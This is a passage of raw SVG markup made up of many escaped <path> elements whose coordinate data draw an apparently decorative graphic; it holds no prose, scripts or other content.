d=\"M527.9,101.5c4.5.1,11.5.6,13,.5-5.8-.3-12.8-1.1-6.8-1.4-4.7-.2-.8.3-5.5.1.3-.1,1.8-.2,1-.4a31,31,0,0,0,4.2.1c-1.9-.4,2-.2,2.4-.4-8.4-.3-4,.6-13.7.2-5.8.7-1,1.9-1.3,3-.1.3-.7.6-2.2.9,2.2.3,2.9.1,4.4.3-4.5.1.1.4-2.1.7a41.51,41.51,0,0,1,6,.5c-2.8-.1-1.5.3-5.5.1-2.5-.1-.4-.5-3.3-.6.8.3-3.8.5-.8.6a98.06,98.06,0,0,1,10,.3c3.9-.6-.1-1.3-4.5-2,.1.1-1,.1-1.4,0,2.7.1,1.9-.2,3-.2h1c2.8.2,2.4.6,4.8.8a21.29,21.29,0,0,1,4.3.1c-5.7-1.4.5-1.9-8.1-2.9-.1.1.5.3-1.1.3C525.6,101.8,526,101.6,527.9,101.5Z\"></path>\n        <path d=\"M732.3,103.2c-.7.3,4.1.3,3.3.6-6.8-.1-2.6.5-6.4.6,6.2-.1-.9.3.6.7,8.9-.4,4.4-1.6,7.7-2.3C729.7,102.6,738.3,103.3,732.3,103.2Z\"></path>\n        <path d=\"M526,99.3c-2.3.1-8.6.3-5,.7C519.7,99.4,528.4,99.9,526,99.3Z\"></path>\n        <path d=\"M524.2,94.1c4.2,0,1.8-.7,4.8-.9,8.1.5,10.1,1.7,1.6,1.8-1.4-.3,1.7-.2.9-.5-4.9,0-5.7,1.1,1.2,1.3-.8-.8,6.3-.8,10.1-1.2-1.7-.1-4-.1-4.4-.2,7.2.2.4-.4,5.2-.4-2,.2,5.1.4,4.3.2-3.4-.1-3.5-.4-6-.6,1.2.3-2.7.1-4,.2.2-.2-2.1-.3-3.1-.4,5.3-.1,7.5,0,9.4-.3-4.6-.2-4.2.1-7.1-.2,1.9.5-4.6.2-5.2.4l-.3-.3c-1.9,0-3.8-.1-5.7-.1C528.3,93.5,521.8,93.8,524.2,94.1Z\"></path>\n        <path d=\"M536.7,95.7c2.9-.1,4.8-.3,6.5-.5C537.2,94.9,535.1,95.6,536.7,95.7Z\"></path>\n        <path d=\"M734.1,99c3.5.1,2.9-.1,7,0C740.5,98.1,739.3,98.7,734.1,99Z\"></path>\n        <path d=\"M519,89.8c8,.1.4-1.1-2.6-1.4-.6.2-6.7.7-3.7.6,2.4,0,2-.4,5.3-.3C515.9,89.2,521.6,89.4,519,89.8Z\"></path>\n        <path d=\"M652.2,86.4c-1.3-.9-6.3-2.1-1-2.8-5.1,0-2.2.2-5.8-.2,2.4.7-11.4,1.2-3.7,2.1-1.7,0-4-.1-4.2,0,6.1.1,1,.4-1,.4,2.8.6-.4,1.4-1,2.1,3.4-.1,7.1.4,7.1.2-2-.1-1.8-.3-3.1-.4,8.8.2,6.5-.2,12.5,0-6.6-.3,1.6-1.2-5.2-1.2C646.8,86.3,651.5,86.5,652.2,86.4Z\"></path>\n        <path d=\"M609.4,72.5c4.1.1,11.6,1,3.2.5.3.4,6.8.4,8.9.6-.5-.4-3.6-.6-4.9-.9C615.6,73.2,611.9,72.1,609.4,72.5Z\"></path>\n        <path d=\"M603.1,63.8a15.43,15.43,0,0,1-2.8-.1,64,64,0,0,0,7.8.9C606.2,64.4,607.1,63.9,603.1,63.8Z\"></path>\n        <path d=\"M601.6,63.6c-1.4-.3,7.4.3,2.7,0a6.88,6.88,0,0,1-1.5-.1c-.1-.1,2.4,0,2.6-.2C602,62.8,597.5,63.4,601.6,63.6Z\"></path>\n        <path d=\"M599.9,60.1c-8.5-.4,4.4-.8-3.9-1.3-2.1.7-4.2,1.6-4.6,2.7C598.8,61.3,592.5,60.3,599.9,60.1Z\"></path>\n        <path d=\"M754.7,60.9c2-.7,3.2-1.4,3.6-2.2-4.6-.1-1.6-.7-7.6-.7C760.3,58.7,749.6,59.9,754.7,60.9Z\"></path>\n        <path d=\"M598.3,55.2c4.7-.2,2.4-.6,7.6-.8-9.4.2,4.6-.4-6.2-.7C598.3,54.6,597,54.4,598.3,55.2Z\"></path>\n        <path d=\"M601,53.5c0-.2,4.6,0,3.9-.2-1.1-.1-2.8-.1-2.9-.2,2.1,0,5.3.2,5.6,0-3.9-.3,3.8-.7-2.2-.9,2.3.1,3.7-.1,1.2-.2a19.08,19.08,0,0,1-4,.1c.2.3,2.7.4,2,.7-4.1,0-.6.2-5.4.2C603.1,53,596,53.3,601,53.5Z\"></path>\n        <path d=\"M600,49.2c9,.1.5.9,6.4,1-.7-.3,0-.4,2.6-.2,0-.6,1.8-.5-3.4-.7.6-.5,3.2-.2,5.2-.4-2.3,0-9.8-.6-7.3-.4C607.4,48.9,602.5,49.1,600,49.2Z\"></path>\n        <path d=\"M643.7,37.3c-.2-.2.5-.2,1.1-.3-5.2-.1-10.6-.6-17-.4,1.5.2,1,.6,3.4.7,1.3-.4.4-.5,3.6-.7C634.5,37.1,643.4,36.9,643.7,37.3Z\"></path>\n        <path d=\"M686.7,26.1a14.19,14.19,0,0,1-3.9.3c-.1-.1-.3-.1-1.5-.1a8.94,8.94,0,0,0,3.2.5C682.1,26.4,692.6,26.6,686.7,26.1Z\"></path>\n        <path d=\"M722.6,95.4a28.18,28.18,0,0,0-7.5-.6c-.2.2,2.1.3,3.1.4-5.8-.1-12.8.2-6.4.6-9,.4-16.9,1.3-11.5,2.7-3.4.5-11.3,1.3-5.1,2.1-5,0-.7.8-3.3,1,1.7.1,3.4.1,3,.3-7.9,1.3-2.1,3-8.6,4.4,7.5.2,1.7.8,5.1,1.1.7-.4,4.7-.5,6.2-.8-1.7-.1-4-.1-4.3-.2a29.54,29.54,0,0,1,5.4-.2c4.4,0,1,.6,6.1.6-13.3-2.2,18.3-2.7,6.9-4.8a20.06,20.06,0,0,0,4.1-.1c-8-.6,5-1-2.7-1.5,7.2.2,3.1-.8,1.9-1,9.2-.5,1.1-1.8,7.5-2.6-2-.2-2.2-.4-4.7-.5,6.4.2,4.4-.2-.1-.1-.1-.2-.6-.4-1.8-.5,4.5,0,4.6.3,7.1.2C724.3,95.5,715.8,95.3,722.6,95.4Z\"></path>\n        <path d=\"M750.3,110.5c-2.7-.3-.9.9.5,1.1C750.9,111.2,751.8,111.1,750.3,110.5Z\"></path>\n        <path d=\"M770.6,108.3a42.59,42.59,0,0,0-7.2-1c4.7,1.1,1.7,1.7,5.2,2.9-.6-.5-.5-.8,2.8-.3C770.3,109,769.1,108.7,770.6,108.3Z\"></path>\n        <path d=\"M766.9,104.6c1.4.3,2.1.5,4.2.8.8,0,1.2-.1.8-.4C769,104.6,769.1,104.9,766.9,104.6Z\"></path>\n        <path d=\"M768.1,103c.7.6-1,1,3.8,1.8C771.2,104.4,774.4,104.3,768.1,103Z\"></path>\n        <path d=\"M745.3,93.6c-4.8-1-3.5,0-.8.4C744.1,93.7,744.5,93.6,745.3,93.6Z\"></path>\n        <path d=\"M768.6,95.7c-1.8-.1-.3.6,1.4,1C769.3,96.3,770.9,96.1,768.6,95.7Z\"></path>\n        <path d=\"M914.7,118.4c0,.8-1.8-.5-5.3-1a21.54,21.54,0,0,0,4.5,1.4,5.88,5.88,0,0,1,2,.2C915.7,118.9,916.1,118.7,914.7,118.4Z\"></path>\n        <path d=\"M745.2,89.2c-3.3-.6-3.5-.3-3.9-.1a9.76,9.76,0,0,0,3.4,1.1c.7-.2-1.8-.6-2.4-.9a21,21,0,0,0,4.1.5C745.2,89.5,745.2,89.4,745.2,89.2Z\"></path>\n        <path d=\"M753.7,82.5c-.1-.4-3.3-.5-2.4-.9,3.1.7,2.8-.7-1.7-1.5-.1.5-1.2.5,1.6,1.3-8.4.1-9.5,2.2-5.5,4.9-2.2-.2-2.2.1-3.9,0,3.2,1.2-3.7,1.5,3.2,2.8-1.9-1.3,1.5-2.2,1.2-3.6-.1-.6-2.8-1.8,1.3-1.3-.2.1-1.4,0-.8.3,6.6,1-.3-.9,2.7-.6.6.5,2.9.6,1.3.8,2.8.5,2.6.2,2.9,0-1.8-.5-2.5-1.3-.5-1.1-2.2-.5-1.3-.2-4.2-.7.7.4.7,1.2-2.8.2,5.1.6-.2-1,2.5-.8a24.35,24.35,0,0,0,4.3.9c-.8-.6-.1-.4-3.4-1.1C751,82,754.4,83.1,753.7,82.5Z\"></path>\n        <path d=\"M919.6,106.2c-2.8,1.6-6.4,2.3-6.4,4.9,1.7.4,4.5,1,5.5,1.4-5.8-1.2-.7.8-6.1-.6-.6.4-.8.8,1.7,1.6-1.1-.7,2.6.2,4.1.6-.2-.2.1-.3.8-.3-1.7-.5-4.5-.9-5.4-1.1,1.2-.2,3.5.2,7,.5-2.2-.8.2-.5.6-.8-6-1-.7-.9-3.7-1.7,1.3.2,1.4.1,3.1.4-1.6-.6-.5-.8.5-1-1.3-.3-2.4-.5-3.3-.8,5.3-.4,2-2.2,5.6-2.5l-2.1-.3A12.12,12.12,0,0,0,919.6,106.2Z\"></path>\n        <path d=\"M929.1,114.2c-2.7-.4-4-.5-4-.2,2,.3,2.3.5,1.2.4,1,.2,2.1.3,3.1.5C928.3,114.4,928.3,114.4,929.1,114.2Z\"></path>\n        <path d=\"M925.7,110.9c1,.6-1,.4-.6.8C929.6,112.6,928.9,111.5,925.7,110.9Z\"></path>\n        <path d=\"M925.4,106.1c-3.8-1-8.8-.7-4.9,0C920.5,105.6,922.4,105.7,925.4,106.1Z\"></path>\n        <path d=\"M888,100.6c-.3-.4,3.5-.3.5-1C889.5,100.2,884.6,99.8,888,100.6Z\"></path>\n        <path d=\"M646.5,59.9c1,.2,2.1.3,3.1.5.3-.2,2.1-.3-1.4-.9C647.8,59.7,645.8,59.4,646.5,59.9Z\"></path>\n        <path d=\"M911,102.4c-.1.3.6.7,2.4,1.1C912.7,103.1,914.8,102.9,911,102.4Z\"></path>\n        <path d=\"M920.4,101.6c7.6,1.3.7-.6,3.6-.6C918,100.1,922.6,101.5,920.4,101.6Z\"></path>\n        <path d=\"M954.4,106.1c-.9-.1-1.9.4.4.8C955.8,107,956.7,106.6,954.4,106.1Z\"></path>\n        <path d=\"M934.9,101.7a10.32,10.32,0,0,1,2.2.5c-.8-.1-1.2-.1-.9.1,2.8.5,2.6.2,2.9,0C936.4,101.8,935.7,101.5,934.9,101.7Z\"></path>\n        <path d=\"M926.5,98.2c-4.7-.7-.6,1.2-6.9-.3,1.9,1,3,1.3.8,1.7,4.7.8,3.4.1,4.8,0C920.3,98.5,929.4,99.4,926.5,98.2Z\"></path>\n        <path d=\"M906,95.6c-2.6-.8.1-.6-4.5-1.4C901.8,94.6,902.5,95.1,906,95.6Z\"></path>\n        <path d=\"M921.7,98.1c.8-.2,3.5-.1-.5-1C922,97.6,918.5,97.4,921.7,98.1Z\"></path>\n        <path d=\"M956.7,102.7c1.6.1,3.4,0-1.3-.8C956.1,102.2,954.5,102.4,956.7,102.7Z\"></path>\n        <path d=\"M929.9,97.1c1.1.4.6.7,2.4,1.1C933.8,98.2,933.8,97.6,929.9,97.1Z\"></path>\n        <path d=\"M955,99.1c-2.7-.5-3.9-.1-1.8.4C953.8,99.4,955.7,99.6,955,99.1Z\"></path>\n        <path d=\"M822.7,76.8c1.6,0,1.1.8,3.5,1.2-1.1-.6,1.3-.4.5-.9C824.2,76.8,820,76,822.7,76.8Z\"></path>\n        <path d=\"M954.7,98.3a7.45,7.45,0,0,1-2-.1,5.75,5.75,0,0,0,2.3.8C955.2,98.9,956.1,98.7,954.7,98.3Z\"></path>\n        <path d=\"M907.2,89.8c-1.4-.6,1.5,0,1.9-.1-2.5-.6-4.3-.4-7.2-.9C904.3,89.2,905.9,89.5,907.2,89.8Z\"></path>\n        <path d=\"M946.5,95.4c-.7.2,1.8.6,3.4,1C951.2,96.2,950.4,95.8,946.5,95.4Z\"></path>\n        <path d=\"M907.6,88.8c-.4.3-1.7-.5-3.2-.6a14.05,14.05,0,0,1-2.9,0,56,56,0,0,1,6.3,1.2C906.8,88.9,910.8,89.4,907.6,88.8Z\"></path>\n        <path d=\"M887.5,85.1c-1.8-.3-3.3-.6-4.3-.8a5.13,5.13,0,0,0,2.4,1.1C884.7,84.8,887.2,85.3,887.5,85.1Z\"></path>\n        <path d=\"M890.7,83.5c-2.2-.3-2.1-1.1-3.4-1,2.5.9-8.7-1.2-3.9,0C885.2,82.5,888,83.4,890.7,83.5Z\"></path>\n        <path d=\"M897.9,84.4c-1.9-.2-4.7-.6-5-.4C896.3,84.6,897.8,84.7,897.9,84.4Z\"></path>\n        <path d=\"M1056.2,110.9c2.9.5,2.9.2,2.9-.1C1055.8,110.2,1055.9,110.5,1056.2,110.9Z\"></path>\n        <path d=\"M893.1,82.5a17.84,17.84,0,0,1-3.3-.8c1,.6-1.2,1,2.8,1.8C893.1,83.1,891.9,82.8,893.1,82.5Z\"></path>\n        <path d=\"M923.4,87.3c-.4.3-5.3-.1.5,1C922.2,87.6,926.4,88,923.4,87.3Z\"></path>\n        <path d=\"M930.9,84.8c1,.5-2.8-.2-1.8.3,1.1.2,2.1.3,3.1.5C931.6,85.1,934.5,85.5,930.9,84.8Z\"></path>\n        <path d=\"M918.5,82.9c.3-1,1.3-.9,3-1.8-5.3-.9-5.7-.8-1.8.3-2-.4-2.2-.2-4.1-.6C919.4,81.8,914,82.1,918.5,82.9Z\"></path>\n        <path d=\"M918.3,80.5c4.8.8,3.8,0,4.7-.3C919,79.6,919.6,80.3,918.3,80.5Z\"></path>\n        <path d=\"M722.2,46.1c-4.1-.8-1.3,1.2-.5,1C721.8,46.5,721.5,46.4,722.2,46.1Z\"></path>\n        <path d=\"M945,81.8a13,13,0,0,1-3.1-.4c3.8,1,1.2,1.1,4.8,1.9C945.9,82.8,947.5,82.4,945,81.8Z\"></path>\n        <path d=\"M890.7,73.1c-3-.6-2.6-.3-5.2-.8-.2-.2-.4-.3-2.2-.6C882.7,72.2,890.6,73.5,890.7,73.1Z\"></path>\n        <path d=\"M1009.7,91.9c-.1.2-3,.4,1.5,1.1C1010.4,92.6,1012.1,92.4,1009.7,91.9Z\"></path>\n        <path d=\"M936.2,79.4c1.9.8-5.4-.9-5.1-.5,3.1.6,2.3.9,4.5,1.4C934.7,79.8,940.1,80.4,936.2,79.4Z\"></path>\n        <path d=\"M741.9,46.7c-2.8-.4-4.4.5-1.5,1C740.5,47.2,741.8,47.1,741.9,46.7Z\"></path>\n        <path d=\"M1001.9,89.8c-3.8-.9-1.6-.9-4.6-1.5.1.6,2.4,1.3,3.8,2C1000.1,89.8,1002.5,90.2,1001.9,89.8Z\"></path>\n        <path d=\"M940.9,79.1c-.4.2-1.8.4.6,1.2C941.6,80.2,943.5,79.9,940.9,79.1Z\"></path>\n        <path d=\"M935.5,77.9c-1.8-.3-3.3-.6-4.3-.8-.6.4,2.3.9,2.6,1.3-1.5-.3-1.9-.5-3.3-.8a.35.35,0,0,0,.1.2c-.7-.1-1.2-.2-1-.1,3.3.5,1.6.6,4.4,1.1,2.7,0,.4-.5-.5-1.2A13.6,13.6,0,0,0,935.5,77.9Z\"></path>\n        <path d=\"M924.6,77.3c.2-.3,2.1-.8-.7-1.6C923.6,76.2,920.8,76.2,924.6,77.3Z\"></path>\n        <path d=\"M764.7,49.9c.6-.2-3.8-1.3-5.4-1.2,1.9.3,2.5.5,2.3.7C762.6,49.6,763.6,49.7,764.7,49.9Z\"></path>\n        <path d=\"M751.3,46.1c-2.5-.3-4.5-1.1-5.2-.9,1.6.4,3,1,1.4.9l2.1.3c.6.1,1.2.2,1,.1C746.7,45.7,753.5,46.9,751.3,46.1Z\"></path>\n        <path d=\"M1049.1,95.4c-2.4-.4-4-.7-5.2-.8.2.2,0,.3,1.2.5C1044.4,94.8,1050.3,96.1,1049.1,95.4Z\"></path>\n        <path d=\"M891.8,69.4c-2.5-.7-5.2-.7-7.4-1.3C884,68.5,889.8,69.2,891.8,69.4Z\"></path>\n        <path d=\"M941.8,76.9c3.4,0,1.5.6,4.4,1.1.2-.5-1-1-5.6-1.7C940.8,76.5,940.4,76.6,941.8,76.9Z\"></path>\n        <path d=\"M890.2,65.8c-5.8-.7-6.1,0-4.5.8,3.3.4,3.3-.2,5.8,0-3.5-.9-2.2,0-4-.2a8.44,8.44,0,0,0-1.2-.4C887.4,65.8,890.4,66.2,890.2,65.8Z\"></path>\n        <path d=\"M1005.1,86.2c3.3.6,2.2,0,6.2.8-.2-.2.1-.3.8-.3C1009.3,86.4,1006.9,86.3,1005.1,86.2Z\"></path>\n        <path d=\"M895.6,67.1c0,.1-.1.1-1-.1,0-.2-1-.4-2.3-.7.7.4-.9.6,1.4,1-.1-.1-.1-.2-.2-.4C895.9,67.5,898.6,67.7,895.6,67.1Z\"></path>\n        <path d=\"M749.3,41.8c.1.4-3.3.4.5,1.1C749.3,42.5,752.4,42.5,749.3,41.8Z\"></path>\n        <path d=\"M887.3,63.9a13,13,0,0,1-3.1-.4c-1,.4,3,1.1,4.6,1.7C889.6,65.1,889,64.3,887.3,63.9Z\"></path>\n        <path d=\"M1130.5,104.1c1.3.2,1.5.4,3.2.6-.4-.3,1.3,0,1.9,0A21.88,21.88,0,0,0,1130.5,104.1Z\"></path>\n        <path d=\"M779.9,45.1c3.5.6,5.6.3,1.8-.4C780.2,44.6,781.3,45.2,779.9,45.1Z\"></path>\n        <path d=\"M971.3,76.1c-1,0-4.7-.1-.7.7a5.88,5.88,0,0,1,2,.2C968.9,76,974.2,76.9,971.3,76.1Z\"></path>\n        <path d=\"M892.3,62.1c-4.3-.7-8.6-.3-4.6.6-.8-.4.2-.4,3,.2C886.9,61.8,895.8,63.1,892.3,62.1Z\"></path>\n        <path d=\"M1084.6,94.9c2.7.2,2.5-.4-1.5-1.1C1084.3,94.3,1081.9,94.3,1084.6,94.9Z\"></path>\n        <path d=\"M1051.7,88.7l-2.1-.3c-.6-.1-1.2-.2-1-.1,3.5.6-2.9,0,2.3.8C1049.9,88.6,1052.3,89,1051.7,88.7Z\"></path>\n        <path d=\"M897.1,61.9c2.5.4.9.6-.8.3-1.1-.3-1.9-.6-3.3-1,.3.3-2,.4,1.5,1.1,1.1-.5,1.5.6,5.3,1C900.7,63.4,901,62.3,897.1,61.9Z\"></path>\n        <path d=\"M1045.7,86.2c.3.3-.7.2-3-.2,0,.1.2.8,1.3.7C1042.4,86,1050.5,87.4,1045.7,86.2Z\"></path>\n        <path d=\"M1027.2,83.8a20.39,20.39,0,0,1,2.2.6c.5-.2,3.6-.1-.4-.8C1030.1,84.1,1028.3,83.9,1027.2,83.8Z\"></path>\n        <path d=\"M1008.3,78.7c-.3.2-2.9-.3-1.8.3a21.3,21.3,0,0,0,4.2.7c.2.2.1.4,2.3.7l-.3-.6C1009.4,79.3,1010.4,79.1,1008.3,78.7Z\"></path>\n        <path d=\"M769.3,36.9c1.4-.2-3.6-.7-3.3-.9,4.7.6-2.5-.9,1.8-.4-2-.3-2.4-.5-4.3-.8.3.9,2.5,1.9-1.1,1.8,3.3.8,1.3,1.4,4.9,2.3.1-.5,1.3-1-.9-1.9,1.1-.1,4.5,1,4.1.5C768.1,37,765.1,35.9,769.3,36.9Z\"></path>\n        <path d=\"M898.2,60.1l-5.2-.9c0,.3-1.8,0,1.3.7C894.2,59.6,898.2,60.4,898.2,60.1Z\"></path>\n        <path d=\"M856.5,51.7c1.3.6-2,0-2.9.1a17.84,17.84,0,0,1,3.3.8C857.9,52.6,858.8,52.2,856.5,51.7Z\"></path>\n        <path d=\"M795,42.2c-3-.7-.8-1.1-4.8-1.9C791.1,40.8,790.1,41.2,795,42.2Z\"></path>\n        <path d=\"M836.8,48.8c-.7-.5,2.7.2,2.9-.1-1.4-.2-2.3-.4-3.2-.6C837.7,48.6,833.5,48.1,836.8,48.8Z\"></path>\n        <path d=\"M911,60.6c-.3.2-4-.6-2.9,0C911.4,61.2,913.8,61.2,911,60.6Z\"></path>\n        <path d=\"M747.2,33.1a5.88,5.88,0,0,1-2-.2c0,.3.8.6,2.4,1C746.2,33.3,750.4,33.8,747.2,33.1Z\"></path>\n        <path d=\"M760.1,35.8c-.1-.4-1.2-.8-3.5-1.2,0,.2-3.4-.5-3-.2C756.3,34.9,756.9,35.3,760.1,35.8Z\"></path>\n        <path d=\"M1052.6,84.4c-.1-.2-.1-.3-.2-.5-2-.3-4.5-.7-4-.3,1.8.3,2.6.3,3.2.5C1051.6,84.2,1051.7,84.2,1052.6,84.4Z\"></path>\n        <path d=\"M889.9,57c-1.1-.5,2.6.2,2.9,0a28.82,28.82,0,0,1-4.3-.9C887.9,56.2,887.7,56.4,889.9,57Z\"></path>\n        <path d=\"M842.5,48.7c1.7.3.7.4,2.3.7-1.7-.7,5.7.6,1.8-.3C847.5,49.6,841.6,48.3,842.5,48.7Z\"></path>\n        <path d=\"M792.2,40.4c1.4-.4,3-1.3-2.2-2.6-3.1-.2,2.2,1.1,1.6,1.4a19.06,19.06,0,0,0-3.1-.4C792.8,39.5,789.2,39.7,792.2,40.4Z\"></path>\n        <path d=\"M893.8,56.9c0-.3,1.7-.2,1.7-.5C892.6,55.9,891.5,56.4,893.8,56.9Z\"></path>\n        <path d=\"M823.4,45.1c.5-.2,2.4.1,1.7-.4C822.8,44.4,819.8,44.5,823.4,45.1Z\"></path>\n        <path d=\"M772.8,36.3c1.3-.1.9-.5-2.5-1.2C770.4,35.4,771.1,35.8,772.8,36.3Z\"></path>\n        <path d=\"M1149.9,97.9c.7.4,1.2.8,4.5,1.3C1154.5,98.8,1152.9,98.4,1149.9,97.9Z\"></path>\n        <path d=\"M768.8,33.8c.8-.3-5.4-1.3-5.3-1C766.4,33.2,766.3,33.4,768.8,33.8Z\"></path>\n        <path d=\"M788,35.4c1.5.3,1.9.5,3.3.8-1.7-.8-1.4-1-2.7-1.7C788.6,34.9,787,34.8,788,35.4Z\"></path>\n        <path d=\"M757.2,29.7a24.5,24.5,0,0,0,3.5,1.2C760.6,30.5,760.9,30.2,757.2,29.7Z\"></path>\n        <path d=\"M822.2,40.4c3.2.5,4.3-.1,1.5-.9C824.5,40.1,819.4,39.6,822.2,40.4Z\"></path>\n        <path d=\"M792.7,35.2c3.8.6,4-.2-.5-1A7.77,7.77,0,0,1,792.7,35.2Z\"></path>\n        <path d=\"M771.3,30.8c-2.5-.4-2.5-.8-4.4-1.2,1,.7,1.1,1.4,5.9,2.3C773.3,31.5,766.8,30.3,771.3,30.8Z\"></path>\n        <path d=\"M755.5,28.2c2.7.2-2.4-1.1.5-.9-2.8-.4-2.2-.6-4.3-.9C753.8,27.2,751.7,27.1,755.5,28.2Z\"></path>\n        <path d=\"M769.3,28.7c-3.3-.6-1.8.1-3.9-.1,2.5.4,1.2.7,3.4,1.1a5.85,5.85,0,0,1,2,.2c-2.2-.9.8.1,1.9-.1C769.8,29,767.5,28.9,769.3,28.7Z\"></path>\n        <path d=\"M894.1,49.3c-3.4-.7-2.9.4.4.8C895.2,49.9,891.9,49.2,894.1,49.3Z\"></path>\n        <path d=\"M1097.3,82.7a4.69,4.69,0,0,0,2.5,1.3c-.6-.4,1.8.1.8-.4C1096.4,82.9,1101.5,83.4,1097.3,82.7Z\"></path>\n        <path d=\"M833,38.6c-.4.1-3.3-.4-1.9.1,1.2.2,3,.5,3.2.6s0,.3,1.2.5C836.9,39.8,834.7,39.2,833,38.6Z\"></path>\n        <path d=\"M768.9,27.8c-1,0-2-.1-3-.2.2-.2-.5-.5-2.3-.8-.4.3,2.5.9.3.7,2,.3,2.4.5,4.3.8C766.3,27.7,772.4,28.6,768.9,27.8Z\"></path>\n        <path d=\"M773.8,28c-.8.1-4.2-.6-2.9.1,1.6.2,3.9.7,4.1.6a10.32,10.32,0,0,1-2.2-.5C772.8,28,777.4,28.7,773.8,28Z\"></path>\n        <path d=\"M756.1,25.3c.2-.2,3.1.3,4,.2-2.4-.4-4-.7-5.2-.8C755.1,24.9,754.9,25,756.1,25.3Z\"></path>\n        <path d=\"M775.5,27.5c-.2.2-3.8-.5-4-.3,3.8.5,1.9.7,5.4,1.2C776.2,28.1,777.9,27.9,775.5,27.5Z\"></path>\n        <path d=\"M800.7,31.7c-5.5-1.1-2.1.5.2.5C798.3,31.7,800.5,31.7,800.7,31.7Z\"></path>\n        <path d=\"M767,25.8c.4.3,9,1.8,5.2.9,0,.1-.1.1-1-.1-.2-.2,0-.3-1.2-.5C770.1,26.3,767.2,25.7,767,25.8Z\"></path>\n        <path d=\"M798.2,30.4c-4.8-.6-3.8-.4-6.4-1.3-.3.3-.2.4-2.8.2,3.2.7,4.3.7,7.5,1.5,1.1,0,1.1-.1-.2-.5C797.5,30.4,798.7,30.6,798.2,30.4Z\"></path>\n        <path d=\"M775,26.4c-3.3-.6-4.2-.6-5.1-.5,1.8.3,3.3.6,4.3.8C773.9,26.4,775.3,26.6,775,26.4Z\"></path>\n        <path d=\"M868.2,41.4c-.6.3,5.7,1.5,6.5,1.4C872.5,42.4,870.4,41.9,868.2,41.4Z\"></path>\n        <path d=\"M1213.9,98.1c-.4.2-2.2.4,1.4,1C1214.6,98.7,1216.3,98.5,1213.9,98.1Z\"></path>\n        <path d=\"M1148.4,86.3c-1.6-.1-.9.7,2.5,1.3A7.85,7.85,0,0,0,1148.4,86.3Z\"></path>\n        <path d=\"M1152.3,82.2c-1.8,1.1-9.7,2-4.9,4.1,4.7,0,9.5-.3,3.7-2.5,1.9,0,2.6.8,4.2.7C1151.7,83.3,1155.1,82.7,1152.3,82.2Z\"></path>\n        <path d=\"M911.4,47c-.8-.4.1-.3,1.2-.2s2.4.3,2.7.3a22.5,22.5,0,0,0-2.7-.5C910,46.2,907.8,46.3,911.4,47Z\"></path>\n        <path d=\"M860.1,36.5a5.77,5.77,0,0,0-2.3,1.2c2.7.4,4,.5,4,.2C857.7,37.1,863.6,37.4,860.1,36.5Z\"></path>\n        <path d=\"M756.2,19.3c-1.5-.1-6.4-.6-2.8.3C752,18.9,759.3,20,756.2,19.3Z\"></path>\n        <path d=\"M842,33.1c5.8,1.3,3.8,1.5,5.8,2.1.2-.2,4.9.8,4,.2-4.6-.6-3-.9-4.5-1.4C844.1,33.5,845.3,33.7,842,33.1Z\"></path>\n        <path d=\"M850.7,35c1.5.3,1.9.5,3.2.8-1.7-.8-.4-.7.5-1C851.1,34.2,850.1,34.4,850.7,35Z\"></path>\n        <path d=\"M1133.4,81.1c-4.5-.8-3.3,0,.3.6Z\"></path>\n        <path d=\"M890,40.4c-2.4-.1,1.4.8,3.5,1.2C894.2,41.3,891.5,40.8,890,40.4Z\"></path>\n        <path d=\"M820.8,29a41.32,41.32,0,0,0-5.2-.8c1.7.3.7.4,2.3.7.1-.1-.4-.4.9-.2S821,29.3,820.8,29Z\"></path>\n        <path d=\"M851.3,34.3c1.7.1.1-1-2.4-1.1C852.2,33.9,846.6,33.5,851.3,34.3Z\"></path>\n        <path d=\"M741.7,15.1c.2.2-.7.1-2-.2.7.3-.9.5,1.4.9C739.4,15.1,745.5,16,741.7,15.1Z\"></path>\n        <path d=\"M912.7,44.2c1.7.2,2-.1.1-.5h-.1c-.4.1-2-.1-1.7.2C911.6,44,912.2,44.1,912.7,44.2Z\"></path>\n        <path d=\"M755.6,15.7c-3.7-.6-3.3-.9-6.5-1.4,3.3.9,1.6,1.2,4.8,1.9C752.3,15.5,755.3,16,755.6,15.7Z\"></path>\n        <path d=\"M862.3,32.9c1.5.6-5.3-.2.4.8C861.7,33.3,865.6,33.6,862.3,32.9Z\"></path>\n        <path d=\"M909.2,40.2a5.13,5.13,0,0,0,2.4,1.1c1.2-.1-.3-.2.8-.4Z\"></path>\n        <path d=\"M855.6,31a5,5,0,0,0-2.3-.8c-.5.1-2,0-2.9.1a28.64,28.64,0,0,1,3.2.6C853.7,30.8,853.8,30.7,855.6,31Z\"></path>\n        <path d=\"M735,11.1c3.4.6,5,.7,5,.4A22,22,0,0,0,735,11.1Z\"></path>\n        <path d=\"M1217.9,88c-.1-.3-.7-.8.7-.7C1214.2,86.6,1215.8,87.4,1217.9,88Z\"></path>\n        <path d=\"M893.1,32.6c-.3-.4.5-.7-2.5-1.2C890.7,31.8,891.4,32.1,893.1,32.6Z\"></path>\n        <path d=\"M885,29.7c.6.6-3.4-.5-5.2-.8-.5.1-2,0-2.9.1,3.2.2,10.4,1.6,12.3,1.5C887.4,30.2,886,29.9,885,29.7Z\"></path>\n        <path d=\"M891.9,29.9c-1-.7-5.4-1.8-.6-1.2-3.1-.7-8.5-1.5-10.7-2.1a.35.35,0,0,0,.1.2c3.1.6,5.9,1.3,7.6,1.8C884.4,28.1,889.4,29.4,891.9,29.9Z\"></path>\n        <path d=\"M860.4,24.6c3.2.7,4.3.2,1.8-.3C861.8,24.5,859.3,24,860.4,24.6Z\"></path>\n        <path d=\"M1216.1,82c.9.7-.5.8,2.6,1.4C1218.6,83,1218.2,82.5,1216.1,82Z\"></path>\n        <path d=\"M872.3,25.2c-1.5-.4,0-.7-3.5-1.2C869,24.3,869,24.7,872.3,25.2Z\"></path>\n        <path d=\"M861.4,22.8c-1.8-.3-3.3-.6-4.3-.8a19.44,19.44,0,0,0,5.5,1.5C861.2,23.1,861.6,23,861.4,22.8Z\"></path>\n        <path d=\"M872.3,23.1c-2.3-.3-3.6-.4-4-.2,1.4.2,2.3.4,3.2.6C870.5,23.1,872.8,23.5,872.3,23.1Z\"></path>\n        <path d=\"M889.7,25.2c-2.6-.4-4.2-.5-6.1-.7,1.6.3,1.1.5,1.3.7,1.4.4,3.9.8,5.4,1.1-.1-.2-.2-.3-.2-.5a27,27,0,0,1-3.1-.5.3.3,0,0,0-.1-.2C888.7,25.6,890.4,25.7,889.7,25.2Z\"></path>\n        <path d=\"M879,23.1a15,15,0,0,1-2.1-.4,4.83,4.83,0,0,0-2.2-.6c-.4.2.9.6,2.2.9C877.8,23.1,878.7,23.3,879,23.1Z\"></path>\n        <path 